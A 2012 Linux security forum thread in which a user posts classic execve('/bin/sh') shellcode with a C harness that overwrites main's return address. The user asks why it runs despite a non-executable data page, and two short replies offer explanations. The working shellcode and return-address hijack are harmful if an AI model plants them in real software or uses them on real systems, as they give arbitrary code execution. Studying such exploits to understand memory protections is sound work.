|
|||||||
| Forums | Search Forums | Register | Forum Rules | Man Pages | Albums | FAQ | Members | Calendar | Search | Today's Posts | Mark Forums Read |
| Security Discuss UNIX and Linux computer and network security, cyber security, cyber attacks, IT security, and more. |
|
|
|
Thread Tools | Search this Thread | Display Modes |
|
#1
06-05-2012
|
|||
|
|||
|
basic shellcode - why it runs on my system, if .data is not executable
Greetings, Suppose we have this piece of code, on Linux/i686 (my machine is Slackware Linux 13.1, 32 bit): Code:
char sc[]= /* 24 bytes */ "\x31\xc0" /* xorl %eax,%eax */ "\x50" /* pushl %eax */ "\x68""//sh" /* pushl $0x68732f2f */ "\x68""/bin" /* pushl $0x6e69622f */ "\x89\xe3" /* movl %esp,%ebx */ "\x50" /* pushl %eax */ "\x53" /* pushl %ebx */ "\x89\xe1" /* movl %esp,%ecx */ "\x99" /* cdql */ "\xb0\x0b" /* movb $0x0b,%al */ "\xcd\x80" /* int $0x80 */ ; main() { int *ret; ret = (int *)&ret + 2; *ret = sc; }What happens in the shellcode sc[] is a system call to execve, for /bin/sh. The question is : WHY this program works ? Because if we compile it, and run pmap and gdb on it, we can see a read & exec page, from virtual address 0x08048000, page in which exists the function main(), and we see another page, read & write (but no exec), from address 0x08049000, in which exists sc[]. In main, the only thing we do is to overwrite the return-address of main() with the address of sc[], which is in a non-executable page. Question 1 : So, WHY on my Slackware 13.1 system it works ? (On other systems, like Ubuntu, it seems it doesn't work, only if we enable with execstack the stack - stack executable.) (Slackware Linux 13.1 : Linux kernel 2.6.33, GCC 4.4.4, /proc/sys/kernel/randomize_va_space == 1) Question 2 : Suppose we have this code : Code:
#include <stdio.h> char sc[]= /* 24 bytes */ "\x31\xc0" /* xorl %eax,%eax */ "\x50" /* pushl %eax */ "\x68""//sh" /* pushl $0x68732f2f */ "\x68""/bin" /* pushl $0x6e69622f */ "\x89\xe3" /* movl %esp,%ebx */ "\x50" /* pushl %eax */ "\x53" /* pushl %ebx */ "\x89\xe1" /* movl %esp,%ecx */ "\x99" /* cdql */ "\xb0\x0b" /* movb $0x0b,%al */ "\xcd\x80" /* int $0x80 */ ; main() { int *ret; ret = (int *)&ret + 2; *ret = sc; printf("Security\n"); }Why it doesn't work ? Why we don't get a shell prompt ? (Compared to question 1.) The only thing that is different is the call to printf, so the modified return address of main remains untouched, after printf(). References : http://www.enderunix.org/docs/en/bof-eng.txt .:: Phrack Magazine ::.Thank you for your help. A. |
| Sponsored Links | ||
|
|
#2
06-14-2012
|
|||
|
|||
|
The CPU type being compiled for may have an effect here.
|
| Sponsored Links | ||
|
|
#3
06-14-2012
|
|||
|
|||
|
Because you change what is on the stack at exit.
Try reading J Koziol 'Shellcoders Handbook'. If I were you I'd avoid phrack. |
| Sponsored Links | ||
|
|
| Thread Tools | Search this Thread |
| Display Modes | |
More UNIX and Linux Forum Topics You Might Find Helpful
|
||||
| Thread | Thread Starter | Forum | Replies | Last Post |
| basic data validation | guessingo | Shell Programming and Scripting | 2 | 05-10-2012 04:25 PM |
| Is this a permission issue I got this shl that runs okay in one data base but not in another DB | rechever | Shell Programming and Scripting | 1 | 05-04-2010 09:24 PM |
| Basic menu system | straight_edge | Shell Programming and Scripting | 2 | 01-19-2007 05:53 AM |
|
|
Linear Mode
